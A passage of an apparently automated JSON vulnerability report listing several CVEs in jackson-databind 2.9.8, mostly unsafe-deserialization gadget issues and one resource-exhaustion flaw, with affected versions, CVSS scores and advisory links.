general-purpose data-binding functionality and tree-model for Jackson Data Processor. FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.6"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.6"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-24616"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-24616"},{"summary":"NetApp Advisory ntap-20200904-0006","url":"https://security.netapp.com/advisory/ntap-20200904-0006"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.6"]}],"title":"CVE-2020-24616/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11620"]}],"cve":"CVE-2020-11620","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-04-23T20:19:02","ids":[{"system_name":"CVE Record","text":"CVE-2020-11620"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"NetApp Advisory","text":"ntap-20200511-0004"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11620"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11620"},{"summary":"NetApp Advisory ntap-20200511-0004","url":"https://security.netapp.com/advisory/ntap-20200511-0004"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11620/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-14060"]}],"cve":"CVE-2020-14060","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-18T14:44:46","ids":[{"system_name":"CVE Record","text":"CVE-2020-14060"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200702-0003"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in Jackson Databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of untrusted data in Jackson Databind FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.5"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14060"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14060"},{"summary":"NetApp Advisory ntap-20200702-0003","url":"https://security.netapp.com/advisory/ntap-20200702-0003"},{"summary":"Snyk Advisory SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314","url":"https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"]}],"title":"CVE-2020-14060/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-42003"]}],"cve":"CVE-2022-42003","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-10-03T00:00:31","ids":[{"system_name":"CVE Record","text":"CVE-2022-42003"},{"system_name":"Debian Advisory","text":"dsa-5283"},{"system_name":"Gentoo Advisory","text":"glsa-202210-21"},{"system_name":"NetApp Advisory","text":"ntap-20221124-0004"}],"notes":[{"audience":"developers","category":"other","text":"Deserialization of Untrusted Data","title":"Additional CWE: 502"},{"category":"description","details":"Vulnerability Description","text":"Uncontrolled Resource Consumption in Jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Uncontrolled Resource Consumption in Jackson-databind In FasterXML jackson-databind 2.4.0-rc1 until 2.12.7.1 and in 2.13.x before 2.13.4.2 resource exhaustion can occur because of a lack of a check in primitive value deserializers to avoid deep wrapper array nesting, when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled. This was patched in 2.12.7.1, 2.13.4.2, and 2.14.0.  Commits that introduced vulnerable code are  https://github.com/FasterXML/jackson-databind/commit/d499f2e7bbc5ebd63af11e1f5cf1989fa323aa45, https://github.com/FasterXML/jackson-databind/commit/0e37a39502439ecbaa1a5b5188387c01bf7f7fa1, and https://github.com/FasterXML/jackson-databind/commit/7ba9ac5b87a9d6ac0d2815158ecbeb315ad4dcdc.  Fix commits are https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea and https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.4.0-rc1|<2.12.7.1"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.12.7.1"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42003"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42003"},{"summary":"Gentoo Advisory glsa-202210-21","url":"https://security.gentoo.org/glsa/202210-21"},{"summary":"NetApp Advisory ntap-20221124-0004","url":"https://security.netapp.com/advisory/ntap-20221124-0004"},{"summary":"Debian Advisory dsa-5283","url":"https://www.debian.org/security/2022/dsa-5283"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.4.0-rc1|<2.12.7.1"]}],"title":"CVE-2022-42003/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36184"]}],"cve":"CVE-2020-36184","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:26","ids":[{"system_name":"CVE Record","text":"CVE-2020-36184"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36184"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36184"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-36184/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-14195"]}],"cve":"CVE-2020-14195","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-18T14:44:43","ids":[{"system_name":"CVE Record","text":"CVE-2020-14195"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200702-0003"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in Jackson Databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of untrusted data in Jackson Databind FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.5"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14195"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14195"},{"summary":"NetApp Advisory ntap-20200702-0003","url":"https://security.netapp.com/advisory/ntap-20200702-0003"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"]}],"title":"CVE-2020-14195/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-9548"]}],"cve":"CVE-2020-9548","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:59:01","ids":[{"system_name":"CVE Record","text":"CVE-2020-9548"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200904-0006"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9548"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9548"},{"summary":"NetApp Advisory ntap-20200904-0006","url":"https://security.netapp.com/advisory/ntap-20200904-0006"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-9548/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-9547"]}],"cve":"CVE-2020-9547","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:59:10","ids":[{"system_name":"CVE Record","text":"CVE-2020-9547"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200904-0006"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4accb2e0de9679174efd3d113a059bab71ff3ec53e882790d21c1cc1@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r742ef70d126548dcf7de5be5779355c9d76a9aec71d7a9ef02c6398a@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra3e90712f2d59f8cef03fa796f5adf163d32b81fe7b95385f21790e6@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc0d5d0f72da1ed6fc5e438b1ddb3fa090c73006b55f873cf845375ab@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0e958d6d5c5ee16efed73314cd0e445c8dbb4bdcc80fc9d1d6c11fc@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/redbe4f1e21bf080f637cf9fbec47729750a2f443a919765360337428@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9547"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9547"},{"summary":"NetApp Advisory ntap-20200904-0006","url":"https://security.netapp.com/advisory/ntap-20200904-0006"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 